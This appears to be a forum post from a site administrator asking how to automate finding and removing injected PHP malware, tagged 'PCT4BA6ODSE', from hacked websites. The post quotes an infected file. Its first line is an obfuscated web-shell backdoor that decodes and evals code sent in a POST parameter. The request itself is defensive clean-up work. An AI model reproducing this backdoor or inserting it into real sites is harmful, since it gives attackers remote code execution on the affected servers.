Lunastone

I know how to determine and find all the malicious code within all the files of a domain however, I get about eight different hacked domains daily so i need something to speed up the process.

Which language do you recommend i use to find the code as explained above? And could you point me into the right direction to identify the start (<?php), content (PCT4BA6ODSE) and end (?>) of the malicious code?

I'm trying to automate the clean-up of hacked websites but unfortunately I have great ideas but not enough knowledge to create the solution that i have written down.

I want to create a script which will search the following code <?php*.*PCT4BA6ODSE*.*?> within all .php files of a folder including sub folders. In this code the symbol *.* can be really anything for example;

<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['nce63e1'])) {eval($s21(${$s20}['nce63e1']));}?><?php

/**

* @author Tarchini Maurizio

* @copyright 2011

*/

$wp_load = dirname(dirname(__FILE__));

for($i=0; $i<10; $i++)

{

if(file_exists($wp_load . '/wp-load.php'))

{

require_once "$wp_load/wp-load.php";

break;

}

else

{

$wp_load = dirname($wp_load);

}

}

?>

<?php

/**

* @author Tarchini Maurizio

* @copyright 2011

*/

$wp_load = dirname(dirname(__FILE__));

for($i=0; $i<10; $i++)

{

if(file_exists($wp_load . '/wp-load.php'))

{

require_once "$wp_load/wp-load.php";

break;

}

else

{

$wp_load = dirname($wp_load);

}

}

?>